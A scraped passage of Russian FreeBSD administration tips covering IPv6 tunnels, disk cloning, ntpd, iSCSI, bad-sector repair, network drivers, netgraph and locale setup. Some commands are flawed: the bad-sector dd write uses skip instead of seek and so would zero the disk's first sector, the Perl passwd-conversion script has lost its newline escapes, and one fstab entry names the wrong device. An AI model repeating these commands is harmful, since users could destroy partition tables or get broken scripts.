lola gw6c: Your IPv6 address is 2001:05c0:8fff:fffe:0000:0000:0000:c243. Oct 17 18:39:46 lola gw6c: The tunnel type is v6udpv4. # ifconfig tun1: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> metric 0 mtu 1280 inet6 2001:5c0:8fff:fffe::c243 --> 2001:5c0:8fff:fffe::c242 prefixlen 128 Opened by PID 873 # traceroute6 www.jp.freebsd.org ... # ping6 www.jp.freebsd.org ... Все прекрасно работает не смотря на то, что выход осуществляется в мир через NAT на модеме. Итак, осталось только понять, "зачем это надо", но ясно одно - за этим будущее. А еще можно посмотреть на танцующую черепаху на http://www.kame.net/ :-) Также рекомендую прочитать документацию (главу в HandBook http://www.freebsd.org/doc/ru_RU.KOI8-R/books/handbook/network-ipv6.html) по поддержке протокола IPv6 в системе FreeBSD.

Клонирование дисков во FreeBSD, используя снапшоты ФС [комментарии]

Создаем снапшот test1 раздела /home mount -v -u -o snapshot /home/snapshot/test1 /home или другой метод: mksnap_ffs /home /home/snapshot/test1 Привязываем снапшот к устройству /dev/md1: mdconfig -a -t vnode -f /home/snapshot/test1 -u 1 При необходимости снапшот можно смонтировать и посмотреть его содержимое: mount -o ro /dev/md1 /mnt .... umount /mnt Копируем содержимое раздела на второй диск: dd if=/dev/md1 of=/dev/ad4s1f bs=16k Отключаем снапшот mdconfig -d -u 1 Выполняем fsck на новом разделе: fsck -f /dev/ad4s1f

ntpd на FreeBSD с подключением через PPP Автор: Furcube [комментарии]

Есть компьютер с FreeBSD 7.0 (но должно работать и для остальных версий) Подключение к интернету производится через pppoe. Провайдер раз в сутки обрывает подключение, соответственно при смене ip (он динамический) ntpd клинит - по команде ntpq -c pe в колонке refid для всех серверов будет .INIT. Когда искал решение, наткнулся на следующий скрипт (немного модифицировал для FreeBSD): #!/bin/sh # # reconfigNtpd, written by Jan Ceuleers, March 2003, revised October 2003 # # Purpose: ntpd running on a machine that has intermittent connectivity to # the Internet, and that does not have a static public IP address, # loses its associations with public NTP servers, even after the # connection to the Internet has been restored. # Restarting the ntpd daemon is a possibility, but the downside # is that this causes time not to be served to local clients until # ntpd has regained synchronisation. # A better way is to configure at least one local clock (the local # clock 127.127.1.0 at high stratum and/or a refclock), to cover # for the periods when there is no Internet connectivity, and to # use this script to unconfig/add{server,peer} all public time # servers at runtime (i.e. without restarting the daemon) # # Usage: reconfigNtpd | ntpdc # # Bugs: * This script only generates unconfig/addpeer and unconfig/addserver # pairs. Any relevant fudge statements or iburst options etc. are # ignored. # # * Location of keys file is hard-coded rather than being derived from # ntp.conf # ### # # Get keyid and password from /etc/ntp/keys # ### set -- $(grep "^15" < /etc/ntp.keys) echo keyid $1 echo passwd $3 ### # # Derive unconfig commands from ntpdc output # ### ntpdc -n -p | awk '!/==/ && !/^ / { if (substr($1,2) !~ /^127.127./) print "unconfig " substr($1,2) }' ### # # Derive addserver commands from /etc/ntp.conf # ### awk '/^server[[:blank:]]/ { if ($2 !~ /^127.127./) print "addserver " $2 }' /etc/ntp.conf ### # # Derive addpeer commands from /etc/ntp.conf # ### awk '/^peer[[:blank:]]/ { print "addpeer " $2 }' /etc/ntp.conf echo quit (источник - http://www.arda.homeunix.net/ntpsetup.html) Записываем куда-нибудь, где не потеряется. Конфиг ntpd следующего вида: /etc/ntp.conf server <сервер> server <сервер> logfile /var/log/ntp.log driftfile /var/db/ntp.drift statsdir /var/db/ntpstats/ keys /etc/ntp.keys trustedkey 1 2 15 controlkey 15 # ntpq requestkey 15 # ntpdc Теперь надо сгенерить ключи для управления. env RANDFILE=/dev/random ntp-keygen В директории, где запускали ntp-keygen будет файл с ключами и симлинк ntpkey_MD5key_<название хоста> В нём будут записаны 16 ключей надо взять содержимое этого файла и запихнуть его в /etc/ntp.keys теперь (пере)запускаем ntpd Для проверки делаем ./reconfigNtpd | ntpdc Если про ошибки ничего не будет написано, значит всё хорошо. Теперь цепляем это на ppp Для этого пишем в файл /etc/ppp/ppp.linkup такое: <название подключения>: !bg sh -c "sleep 5; <путь>/reconfigNtpd | ntpdc" Задержку в 5 секунд сделал для того, чтобы ntpdc запустился после прописывания маршрута.

Настройка службы iSCSI на сервере FreeBSD (доп. ссылка 1) Автор: Сгибнев Михаил [комментарии]

Q. Как я могу установить и настроить службу iSCSI на сервере FreeBSD ? A. FreeBSD 7.x полностью поддерживает iSCSI. Старые версии, такие как FreeBSD 6.3 требуют обратного портирования для поддержки iSCSI. Следущие инструкции приведены для настройки iSCSI только под FreeBSD 7.0. FreeBSD iscsi_initiator driver iscsi_initiator в ядре FreeBSD реализует страндарт сетевого протокола Internet SCSI (iSCSI), взаимодействует с пользовательским окружением iscontrol и обеспечивает доступ к удаленным виртуальным SCSI устройствам. Компилирование драйвера обратите внимание на то, что FreeBSD 7.x поставляется с уже скомпилированным драйвером. Вы можете пропустить этот шаг, если драйвер /boot/kernel/iscsi_initiator.ko уже присутствует в вашей системе. Для компиляции ядра с драйвером, выполните следущее: # cd /usr/src/sys/i386/conf # cp GENERIC ISCSIKERNEL # vi ISCSIKERNEL Вставьте строку: device iscsi_initiator Сохраните и закройте файл конфигурации. Соберите ядро: # cd /usr/src # make buildkernel KERNCONF=ISCSIKERNEL Установите ядро: # make installkernel KERNCONF=ISCSIKERNEL Перезагрузите систему: # reboot Установка драйвера iSCSI в FreeBSD Нам необходим драйвер ядра FreeBSD для протокола iSCSI, который называется /boot/kernel/iscsi_initiator.ko. Загрузите его можно с правами пользователя root следующей командой: # kldload -v iscsi_initiator.ko Вывод: Loaded iscsi_initiator.ko, id=6 Для загрузки драйвера во время начальной загрузки, поместите слудующую строку в /boot/loader.conf: # vi /boot/loader.conf # Beginning of the iSCSI block added by Vivek iscsi_initiator_load="YES" # End of the block added by Vivek Сохраните и закройте файл. Команда iscontrol для подключения, предоставления и контроля сессии iSCSI initiator. Теперь нам необходимо использовать команду iscontrol. Сперва просмотрим сессии: # iscontrol -d targetaddress=iSCSI-SERVER-IP-ADDRESS initiatorname=nxl # iscontrol -v -d targetaddress=192.168.1.100 initiatorname=nxl Пожалуйста, запишите список доступных targetnames/targetadresses. Как только будет известно targetname, отредактируйте файл /etc/iscsi.conf: # vi /etc/iscsi.conf Укажите директивы подобным образом: officeiscsi { authmethod = CHAP chapIName = YOUR-ISCSI-USERNAME chapSecret = YOUR-ISCSI-PASSWORD initiatorname = nxl TargetName = iqn.XYZZZZZZZZZZZZZ # whatever "iscontrol -v -d " gives you TargetAddress = 192.168.1.100:3260,1 # your iscsi server IP } Сохраните и закройте файл. Где: officeiscsi { : Начало конфигурации iSCSI. authmethod : Установить в качестве метода аутентификации chap chapIName : Имя chapSecret : Пароль initiatorname : Если не указано другое, то iqn.2005-01.il.ac.huji.cs:<hostname> TargetName : Имя, под которым будет изветен target. Не путайте его с target address, который назначается администратором или через поиск устройств. TargetAddress : Имеет вид domainname[:port][,portal-group-tag] согласно RFC: domainname может быть определен как имя DNS, адрес IPv4 в десятичном представлении или IPv6 адрес, как указано в [RFC2732]. } : Конец конфигурации Старт сессии iSCSI Следущие команды читают опции из /etc/iscsi.conf, используя targetaddress в блоке, называемом officeiscsi, и запускают сессию iscsi. # iscontrol -c /etc/iscsi.conf -n officeiscsi Как только вы выполните команду iscontrol, должно создаться новое устройство в каталоге /dev. Для проверки выполним команду dmesg: # dmesg Форматируем диск iSCSI Запустим sysinstall для форматирования обнаруженного устройства iSCSI: # sysinstall Выбираем Custom > 3 Partition > Выбираем устройство iSCSI по имени da1. После форматирования вводим: # mkdir /iscsi # mount /dev/da1s1 /iscsi Возможно вам понадобится обновить файл /etc/fstab: /dev/ad1s1 /iscsi ufs rw 3 3

Как избавиться от нечитаемых секторов на диске [комментарии]

В логе smartd появились подобные свидетельства наличия нечитаемых секторов на диске: smartd[798]: Device: /dev/ad5, 15 Currently unreadable (pending) sectors smartd[798]: Device: /dev/ad5, 15 Offline uncorrectable sectors SMART тестирование подтвердило подозрения: Запускаем фоновый тест диска, не мешающий основной работе: smartctl -t long /dev/ad5 Ждем завершения периодически просматривая статус: smartctl -l selftest /dev/ad5 В итоге смотрим содержимое лога, в самом конце вывода: smartctl -a /dev/ad5 Имеем: # 1 Extended offline Completed: read failure 90% 2916 10373954 Выявляем полный список сбойных секторов, путем чтения всех данных с диска: dd if=/dev/ad5 of=/dev/null bs=512 conv=noerror,sync В один прекрасный момент появятся надписи вида: dd: /dev/ad5: Input/output error 10373954+0 records in 10373954+0 records out 5311464448 bytes transferred in 2427.397393 secs (2188131 bytes/sec) В системном логе увидим: kernel: ad5: TIMEOUT - READ_DMA retrying (1 retry left) LBA=10373954 kernel: ad5: TIMEOUT - READ_DMA retrying (0 retries left) LBA=10373954 .... kernel: ad5: FAILURE - READ_DMA timed out LBA=10374109 kernel: ad5: TIMEOUT - READ_DMA retrying (1 retry left) LBA=10374113 Проверяем, каждый участок еще раз: dd if=/dev/ad5 of=/dev/null bs=512 count=1 skip=10373954 conv=noerror,sync Смотрим какой файл в ФС подпадает под этот блок. Смотрим и примерно вычисляем номер раздела на который приходится сбойный сектор (LBA 10373954): fdisk -s /dev/ad5 /dev/ad5: 775221 cyl 16 hd 63 sec Part Start Size Type Flags 1: 63 398444067 0xa5 0x80 2: 398444130 382973535 0xa5 0x80 10373954 - 63 = 10373891 disklabel /dev/ad5s1 # /dev/ad5s1: 8 partitions: # size offset fstype [fsize bsize bps/cpg] a: 2097152 0 4.2BSD 2048 16384 28552 b: 4194304 2097152 swap c: 398444067 0 unused 0 0 # "raw" part d: 2097152 6291456 4.2BSD 2048 16384 28552 e: 10485760 8388608 4.2BSD 2048 16384 28552 f: 104857600 18874368 4.2BSD 2048 16384 28552 g: 104857600 123731968 4.2BSD 2048 16384 28552 h: 162127234 228589568 4.2BSD 2048 16384 28552 Видим, что 10373891 приходится на раздел /dev/ad5s1e Расчитываем смещение относительно начала раздела: 10373891 - 8388608 = 1985283 Находим иноду, которой принадлежит заданный блок: fsdb -r /dev/ad5s1e findblk 1985283 повторяем для каждого сбойного сектора (для Linux нужно использовать debugfs - http://smartmontools.sourceforge.net/BadBlockHowTo.txt) Пытаемся записать данные в сбойный сектор, чтобы инициировать процесс ремапинга на диске. sysctl kern.geom.debugflags=16 # иначе будет dd: /dev/ad5: Operation not permitted) dd if=/dev/zero of=/dev/ad5 bs=512 count=1 skip=10373954 conv=noerror,sync sysctl kern.geom.debugflags=0 Если после записи сектор начал читаться - все ok, если нет - резервная область на диске уже заполнена, пробуем запретить обращещние окружающих секторов в ФС: man badsect /dev/ad5s1e примонтирован как /usr, создаем директорию /usr/BAD и выполняем badsect /usr/BAD 1985283 fsck -y /dev/ad5s1e Полезные порты: /usr/ports/sysutils/recoverdm /usr/ports/sysutils/diskcheckd

Настройка работы Dell Wireless 1390 WLAN Mini-PCI Card во FreeBSD (доп. ссылка 1) (доп. ссылка 2) Автор: Sokolov Alexey [комментарии]

Драйвера для данного беспроводного адаптера в ядре FreeBSD на данный (март 2008) не существует, но я расскажу как сконвертировать windows-драйвера в ko-модуль. 1. качаем официальный драйвер: http://www.x-drivers.ru/component/option,com_remository/itemid,36/func,fileinfo/id,28277/ 2. конвертируем его: %ndisgen bcmwl5.inf bcmwl5.sys 3. подгружаем полученный модуль: %kldload bcmwl5_sys.ko Пожалуйста: % ifconfig -l em0 lo0 ndis0 ndis0 - появившийся wifi-интерфейс.

Как восстановить работу после ошибки с ldconfig во FreeBSD (доп. ссылка 1) Автор: Mamoru [комментарии]

Пытаясь добавить библиотеку libnsl запустил следующее: ldconfig -m /usr/compat/linux/lib/ теперь на любой ввод машина выдаёт: /libexec/ld-elf.so.1: Undefined symbol "__stdinp" referenced from COPY relocation in Для того чтобы вернуться к нормальной работе: 1. грузимся в однопользовательский режим 2. монтируем Var #>mount -rw /var 3. правим хинты #>ldconfig /lib 4. монтируем Usr #>mount -rw /usr 5. добавляем для начального комплекта #>ldconfig -m /usr/lib и дальше по списку /var/run/ld-elf.so.hints: search directories: /lib:/usr/lib:/usr/lib/compat:/usr/X11R6/lib:/usr/local/lib:/usr/local/lib/compat:\ /usr/local/lib/compat/pkg:/usr/local/lib/mysql:/usr/local/lib/apache2 6. перегружаемся Если необходимо загрузить библиотеки имеющие права записи для группы или с владельцом отличным от root, установите в YES для отключения проверок безопасности ldconfig (опция -i). ldconfig_insecure="NO" Пути, по которым ищутся разделяемые библиотеки ldconfig_paths="/usr/lib/compat /usr/X11R6/lib /usr/local/lib \ /usr/local/lib/compat/pkg /usr/compat/linux/lib" Пути, по которым ищутся разделяемые библиотеки a.out ldconfig_paths_aout="/usr/lib/compat/aout /usr/X11R6/lib/aout /usr/local/lib/aout"

Сброс буфера системных сообщений FreeBSD (доп. ссылка 1) Автор: mr-tacitus [комментарии]

Сбросить буфер системных сообщений (вывод команды dmesg) можно с помощью sysctl: sysctl kern.msgbuf_clear=1

Ограничение скорости на интерфейсе средствами netgraph во FreeBSD (доп. ссылка 1) Автор: Anton Yuzhaninov [комментарии]

Пример того как можно ограничить скорость на интерфейсе: #!/bin/sh kldload ng_ether kldload ng_car ngctl -f- <<-EOF mkpeer re0: car lower lower name re0:lower re0_car connect re0: re0_car: upper upper msg re0_car: setconf { upstream={ cbs=8192 ebs=65535 cir=100000 greenAction=1 yellowAction=1 redAction=2 mode=2 } downstream={ cbs=8192 ebs=65535 cir=1000000 greenAction=1 yellowAction=1 redAction=2 mode=2 } } EOF Если считать что к re0 у нас подключен клиент, то upstream это трафик от клиента в инет, downstream - трафик из инета к клиенту. cir - скорость в битах в секунду (в мане опечатка) mode=2 - это RED цифры для cbs/ebs взяты с потолка. Рекомендации по поводу этих параметров можно поискать в инете по ключевым словам random early detection можно тут посмотреть например http://www.icir.org/floyd/REDparameters.txt

Остановка netgraph нод после mpd (доп. ссылка 1) Автор: Roman Y. Bogdanov [комментарии]

С помощью этого маленького скрипта, можно выполнить освобождение netgraph нод, которые оставляет за собой упавший в "корку" MPD3. #!/bin/sh for j in "" 1 2 3 4 5 6 7 8 9 10 11 12; do for i in 0 1 2 3 4 5 6 7 8 9; do echo $j$i ngctl shutdown ng$j$i: ngctl shutdown mpd$1-pptp$j$i: done done

Объединение сетевых интерфейсов при помощи протокола LACP во FreeBSD 7 (доп. ссылка 1) Автор: s@sh@ [комментарии]

Собираем ядро с поддержкой LACP (Link aggregation control protocol): device lagg Объединяем интерфейсы em0 и em1: ifconfig em0 up ifconfig em1 up ifconfig lagg0 create ifconfig lagg0 up laggproto lacp laggport em0 laggport em1 ifconfig lagg0 10.10.10.18 netmask 255.255.255.0 route add -net 0.0.0.0 10.10.10.1 0.0.0.0 На Cisco и к каждому нужному интерфейсу прописываем: interface GigabitEthernet2/2 .... channel-protocol lacp channel-group 23 mode active interface GigabitEthernet2/16 .... channel-protocol lacp channel-group 23 mode active

Установка неподдерживаемой сетевой карты ASUS NX1001 во FreeBSD 6.2 Автор: fenixfenix [комментарии]

При установке сетевой карточки Asus NX1001, я не смог обнаружить её при наборе команды ifconfig. А также в sysinstall->Configure->Networking. Первое, что мне пришло в голову конфликт с ACPI, после отключения в БИОСе ACPI - результатов никаких не дало. Поэтому пришлось заняться поисками решения этой проблемы копаясь в интернете, особо на сайте freebsd.org. Найдя похожую проблему работы с сетевой картой Asus NX1001 в FreeBSD 6.2, вот что в итоге необходимо было сделать. Набрав команду pciconf -lv и найдя среди результатов вывода "Sundance ST201 10/100BaseTX". Мне пришлось дописать в файлах: /usr/src/sys/pci/if_ste.c /usr/src/sys/pci/if_stereg.h нижеследующее (строка AS_VENDORID...), в файле if_ste.c: static struct ste_type ste_devs[]={ {ST_VENDORID, ST_DEVICEID_ST201,"Sundance ST201 10/100BaseTX"}, {AS_VENDORID, AS_DEVICEID_NX1001,"ASUS NX1001 10/100BaseTX"}, {DL_VENDORID, DL_DEVICEID_DL100050,"D-Link DL10050 10/100BaseTX"}, {0,0,NULL} }; в файле if_stereg.h: #define AS_VENDORID 0x13F0 #define AS_DEVICEID_NX1001 0x0200 После этого мы обязаны пересобрать наше старое ядро: cd /usr/src/sys/i386/conf/ cp GENERIC GATEWAY ee GATEWAY config GATEWAY cd ../compile/GATEWAY make depend make make install shutdown -r now В итоге в нашем случае появляется сетевая карточка в устройствах как sto0.

Импорт паролей и пользователей из Linux в FreeBSD Автор: bytestore [комментарии]

Копируем в текущую директорию passwd и shadow файлы из Linux. Запускаем: ./mkpasswd.pl > new.master.passwd Открываем файл new.master.passwd в текстовом редакторе и заменяем строки с описанием системных аккаунтов из /etc/master.passwd Копируем new.master.passwd в /etc. Делаем бэкап /etc/master.passwd. Перестраиваем хэши через запуск команды pwd_mkdb -p /etc/new.master.passwd Если всплыли ошибки повторяем запуск pwd_mkdb на бэкап файле, для отката изменений. Скрипт mkpasswd.pl #!/usr/local/bin/perl # Listing 21.1. Sample Perl Script to Convert # a Linux User Database for Use in FreeBSD # Set the following to the location of bash on your FreeBSD #machine (if installed), # or to /bin/csh to switch /bin/bash users to csh $newshell = "/bin/sh"; open ( PASS, '< ./passwd' ); @passwd = <PASS>; # Read in the passwd file close PASS; open ( SHAD, '< ./shadow' ); @shadow = <SHAD>; # Read in the shadow file close SHAD; foreach $user (@shadow) { @sdata = split(/:/,$user); $passhash{$sdata[0]} = $sdata[1]; # Make a lookup table based on usernames } foreach $user (@passwd) { @pdata = split(/:/,$user); $pdata[6] = $newshell."n" if ($pdata[6] eq "/bin/bashn"); $pdata[1] = $passhash{$pdata[0]}; # Replace the "x" with the password hash splice (@pdata,4,0,undef,"0","0"); # Splice in extra blank fields foreach (@pdata) { # Print the combined output line print "$_"; print ":" unless ($_ =~ /n/); } } откуда взял скрипт непомню :(

3 шага для перехода на UTF-8 во FreeBSD (доп. ссылка 1) Автор: Sokolov Alexey [комментарии]

1. в ~/.xinitrc пишем (именно сюда а не в /etc/profiles потому как системная консоль FreeBSD не поддерживает юникод, посему локаль сия будет использоваться только в иксах): export LANG='ru_RU.UTF-8' export LC_ALL='ru_RU.UTF-8' 2. выполняем конвертацию содержимого файловой системы из koi8-r в UTF-8 (необходим порт converters/convmv): %convmv -f koi8-r -t UTF-8 путь_к_разделу/* --notest -r 3. далее все зависит от терминала, если у вас что-то вроде gnome-terminal, то достаточно будет сменить кодировку в опциях на UTF-8, если же у вас что-то вроде xterm'а, тогда в ~/.Xresources необходимо будет поменять шрифт, например так (для этого шрифта необходим пакет x11-fonts/terminus-font): XTerm*font: -*-terminus-medium-*-*-*-*-*-*-*-*-iso10646-1 для syscons(4) на i386: 1. ставим sysutils/jfbterm и textproc/uim-m17nlib 2. меняем стандартную переключалку языка с Shift+Space на Ctrl+\ добавлением в ~/.uim (define-key generic-on-key? "<Control>\\") (define-key generic-off-key? "<Control>\\") 3. ставим локаль и добавляем запуск uim-fep и jfbterm в ~/.profile export LANG=ru_RU.UTF-8 exec jfbterm -e uim-fep или в ~/.login (для tcsh) setenv LANG ru_RU.UTF-8 exec jfbterm -e uim-fep Для syscons(4), универсальный способ, неполный юникод: 1. ставим шрифт и раскладку koi8-r в /etc/rc.conf # шрифт font8x8=koi8-r-8x8 font8x14=koi8-r-8x14 font8x16=koi8-r-8x16 # раскладка keymap=ru.koi8-r 2. ставим sysutils/screen, рекомендую более новый ftp://ftp.lissyara.su/users/Guest/screen.diff 3. ставим локаль и добавляем запуск screen в ~/.profile (для sh) # экспортируем локаль и тип терминала export LANG=ru_RU.UTF-8 TERM=xterm # запускаем сессию 'desktop', если уже не запущена if ! screen -S desktop -ls | fgrep -q desktop; then screen -S desktop -dm fi # подсоединяемся к сессии 'desktop' if vidcontrol -i adapter >&- 2>&- then # в syscons используем локаль koi8-r LC_CTYPE=ru_RU.KOI8-R TERM=cons25r \ exec screen -x desktop else # в X'ах используем дефолтную локаль exec screen -x desktop fi Примечание: Символы за пределами koi8-r будут отображаться как ??? (вопросики). Если хотите полный (многоязычный) юникод, то используйте способ с jfbterm.

Настройка управления FreeBSD сервера через COM порт (доп. ссылка 1) Автор: LM [комментарии]

Что надо сделать на FreeBSD сервере: 1. Подключаем COM1 кабель 2. Заходим под root и пишем: echo "-Dh" > /boot.config 3. В файле /etc/ttys заменяем строчку ttyd0 "/usr/libexec/getty std.9600" dialup off secure на ttyd0 "/usr/libexec/getty std.9600" vt100 on secure 4. Перезагружаем FreeBSD. Что надо сделать на Windows XP машине (клиент): 1. Start -> All Programs -> Accessories -> Communications -> HyperTerminal 2. В открывшемся окне New Connections в поле Name пишем что нить типа freebsd-serial 3. В окне Connect To выбираем номер ком-порта (к примеру COM1) 4. В окне COMx Properties на вкладке Port Settings надо выставить следующие значения: Bits per second: 9600 Data bits: 8 Parity: None Stop bits: 1 Flow control: Xon / Xoff и на жать на кнопку ОК 5. Соединение установиться. Далее можно сохранить File -> Save. 6. Можно работать. Что нужно сделать если в место Windows XP для управления используется соседняя FreeBSD машина: в зависимости от версии FreeBSD: cu -s 9600 -l /dev/cuad0 cu -s 9600 -l /dev/cuaa0 где cuaaX/cuaaX устройства ком порта

Обзор небольших полезных утилит под FreeBSD (доп. ссылка 1) Автор: Денис Юсупов [комментарии]
Пришла мысль упорядочить немного список утилиток из портов, которые облегчают жизнь админа FreeBSD.

arpwatch - для мониторинга изменений mac/ip-адресов;
port-maintenance-tools - набор утилит для работы с портами (portupgrade, portinstall и др.);
portaudit - позволяет автоматически проверить перед установкой какого-либо порта, не числится ли он в базе уязвимостей.
screen - для работы с виртуальными консолями
mbmon, healthd для мониторинга температуры, вольтажа и оборотов
arping- "пингует" компьютеры arp-запросами, позволяя определить, находится ли комп в локальной сети даже если у последнего установлен файервол.
fastest_cvsup - нахождение самого быстрого cvsup сервера для обновления портов и/или сырцов системы.
cvsup-without-gui - собственно, сам клиент для обновления.
nmap - сетевой сканер портов.
sudo - для настройки рутовых привилегий, выдаваемых другим пользователям без необходимости сообщать рутовый пароль.
vim (vim-lite) - редактор. Совмещает удобства vi и привычки с "обычных" редакторов
yawho - показывает, кто сидит, откуда и что запущено и т.п. Напоминает "w", но поудобнее.
whowatch - очень удобная утилитка для просмотра в реальном времени процессов других залогиненных пользователей и элементарных операций (посылка сигналов kill, разлогинивание и т.д.)
mtr - утилита, обьединяющая наподобии виндового "pathping" команды traceroute и ping. Весьма удобна для проверки сети.
lynx-ssl - браузер с поддержкой ssl, работающий в текстовом режиме. Удобен. Полезен при проверке корректности html кода.
elinks - продвинутая версия lynx. Встроенный менеджер закачек, готовность к работе на русском языке без дополнительных телодвижений
ipcalc - Сетевой калькулятор. Противопоказан людям, готовящимся к сдачи CCNA и рассчитывающим все сети вручную ;-)
apg - Удобный генератор случайных паролей.
pwgen2 - Ещё один удобный генератор.

Почему некоторые rcNG-скрипты не останавливают процесс Автор: minotaur [комментарии]

В ОС FreeBSD иногда появляется проблема, когда rcNG-скрипт запускает процесс (процесс запускается нормально, pid-файл создается, с правами все в порядке), но не хочет его останавливать. Например, SpamAssassin: # /usr/local/etc/rc.d/sa-spamd start Starting spamd. # ls -l /var/run/spamd/spamd.pid -rw-r--r-- 1 root spamd 6 1 авг 08:37 spamd.pid # /usr/local/etc/rc.d/sa-spamd stop spamd not running? (check /var/run/spamd/spamd.pid) Причина проблемы не очевидна, решение находится из man ps: если длина аргументов больше значения переменной ядра kern. ps_arg_cache_limit, то ps показывает не полную строку запуска процесса, а лишь само имя процесса в квадратных скобках. И бывают случаи (как в SpamAssassin), когда имя процесса не совпадает с именем в rcNG-скрипте (переменная name). Поэтому rcNG-скрипт не обнаруживает запущенного ним процесса в выводе ps. Решение - увеличить значение переменной ядра kern.ps_arg_cache_limit в sysctl.conf. Замечание: Если в rc.conf в spamd_flags присутствует --debug, то rcNG-скрипт работать не будет, потому что в этом случае вывод ps axww меняется. Например вместо: 68514 ?? Ss 0:11,27 /usr/local/bin/spamd --siteconfigpath=/usr/local/etc/mail/spamassassin -x -d -l --max-conn-per-child=128 --timeout-tcp=10 --timeout-child=300 --pidfile=/var/run/spamd/spamd.pid --syslog=local0 --username=spamd --groupname=spamd --allowed-ips=127.0.0.0/8 --listen-ip=127.0.0.1 -d -r /var/run/spamd/spamd.pid (perl5.8.8) получаем 68514 ?? Ss 0:11,27 /usr/local/bin/perl -T -w /usr/local/bin/spamd --siteconfigpath=/usr/local/etc/mail/spamassassin -x -d -l --max-conn-per-child=128 --timeout-tcp=10 --timeout-child=300 --pidfile=/var/run/spamd/spamd.pid --syslog=local0 --username=spamd --groupname=spamd --allowed-ips=127.0.0.0/8 --listen-ip=127.0.0.1 --debug received-header -d -r /var/run/spamd/spamd.pid Решение этой проблемы - правка rc.subr, что есть дело нелегкое. И проще помнить про этот нюанс.

Инструкция по включению журналирования в UFS2. (доп. ссылка 1) Автор: Sokolov Alexey [комментарии]

Требуется создать журналируемую файловую систему UFS2 объемом более 1 Гб на FreeBSD 6.1-STABLE. Для начала необходимо обновить дерево исходных текстов (/usr/src) до стабильной версии. После чего переходим в каталог /usr/src и создаем там необходимые директории: # cd /usr/src # mkdir {sbin/geom/class/journal,sys/geom/journal,sys/modules/geom/geom_journal} Теперь качаем сам патч: # fetch http://people.freebsd.org/%7Epjd/patches/gjournal6.patch Накладываем его на исходные тексты: # patch < gjournal6.patch Компилируем и ставим geom_journal (возможно имеет смысл пересобрать весь мир): Далее есть два пути - пересобрать весь "мир" (см. файл /usr/src/UPDATING), либо пересобрать только то, что было модифицировано. Предпочтительней первый путь, однако можно обойтись и без него. Для этого пересоберите следующие утилиты (зайдя в нижеперечисленные каталоги и выполнив в каждом из них 'make; make install; make clean'): /usr/src/include/ /usr/src/sbin/geom/class/ /usr/src/sbin/mount/ После чего добавляем в конфиг ядра строчку: options UFS_GJOURNAL Компилируем ядро, ставим, перезагружаемся... После перезагрузки подгружаем необходимый модуль командой # gjournal load либо: # kldload geom_journal.ko (команды эквивалентны) Далее нам необходимо размонтировать раздел, на который мы собираемся поставить журнал. Пусть это будет '/dev/ad0s3d' и точка монтирования '/mnt/work': # umount -f /mnt/work Теперь собстенно "прикручиваем" журнал: # gjournal label /dev/ad0s3d Монтируем командой: # mount -o async,gjournal /dev/ad0s3d.journal /mnt/work NB! префикс '.journal' появляется при наличии в памяти модуля geom_journal.ko. Поэтому, если вы захотите чтобы система автоматически монтировала раздел с поддержкой журнала: пропишите в файл /boot/loader.conf строчку: geom_journal_load="YES" и соответствующую запись в fstab. Для данного примера она будет выглядеть так: /dev/ad0s3d.journal /mnt/work ufs rw,async,journal 2 2 Все, готово! (C) 2006 Sokolov Alexey <nullbsd at gmail.com>

Новый способ использования NDIS во FreeBSD 5.x и 6.x (доп. ссылка 1) Автор: Kond [комментарии]

Все статьи на opennet описывают создание модуля NDIS для FreeBSD старым методом: ndiscvt -i *.inf -s *.sys -o ndis_driver_data.h Данный способ уже давно устарел и теперь нужно использовать программу ndisgen. Например. Имеем файлы из комплекта Windows драйверов: Fw1130.bin - Network interface firmware. FwRad16.bin - Radio firmware. TNET1130.INF - Driver information file. tnet1130.sys - Driver binary. Старый способ: cd /sys/modules/ndis make depend make make install cd ../if_ndis ndiscvt -i TNET1130.INF -s tnet1130.sys -f Fw1130.bin -o ndis_driver_data.h make depend make make install ndiscvt -f FwRad16.bin cp FwRad16.bin.ko /boot/kernel kldload FwRad16.bin kldload if_ndis Для автоматизации загрузки помещаем в /boot/loader.conf FwRad16.bin_load="YES" if_ndis_load="YES" Новый способ (не требует установки исходных текстов ядра): ndisgen ... отвечаем на интерактивные вопросы, на выходе получаем tnet1130_sys.ko cp tnet1130_sys.ko /boot/kernel/ kldload ndis kldload if_ndis kldload tnet1130_sys Для автоматизации загрузки помещаем в /boot/loader.conf ndis_load="YES" if_ndis_load="YES" tnet1130_sys_load="YES"

Пример настройки ng_neflow для нескольких интерфейсов. Автор: stalex [комментарии]

#cat ng5_netflow.sh #!/bin/sh kldload ng_netflow kldload ng_ether kldload ng_tee kldload ng_one2many /usr/sbin/ngctl -f- <<-SEQ mkpeer em2: tee lower right connect em2: em2:lower upper left name em2:lower em2_tee mkpeer em2:lower netflow right2left iface0 name em2:lower.right2left netflow msg netflow: setifindex { iface=0 index=1 } connect em2:lower netflow: left2right iface1 msg netflow: setifindex { iface=1 index=1 } mkpeer vlan254: tee lower right connect vlan254: vlan254:lower upper left name vlan254:lower vlan254_tee connect vlan254:lower netflow: right2left iface3 msg netflow: setifindex { iface=3 index=1 } connect vlan254:lower netflow: left2right iface4 msg netflow: setifindex { iface=4 index=1 } mkpeer vlan22: tee lower right connect vlan22: vlan22:lower upper left name vlan22:lower vlan22_tee connect vlan22:lower netflow: right2left iface5 msg netflow: setifindex { iface=5 index=1 } connect vlan22:lower netflow: left2right iface6 msg netflow: setifindex { iface=6 index=1 } mkpeer vlan21: tee lower right connect vlan21: vlan21:lower upper left name vlan21:lower vlan21_tee connect vlan21:lower netflow: right2left iface7 msg netflow: setifindex { iface=7 index=1 } connect vlan21:lower netflow: left2right iface8 msg netflow: setifindex { iface=8 index=1 } mkpeer netflow: ksocket export inet/dgram/udp msg netflow:export connect inet/127.0.0.1:20001 SEQ

В двух словах про включение NAT и Firewall в ОС FreeBSD (доп. ссылка 1) Автор: hub.ru [комментарии]

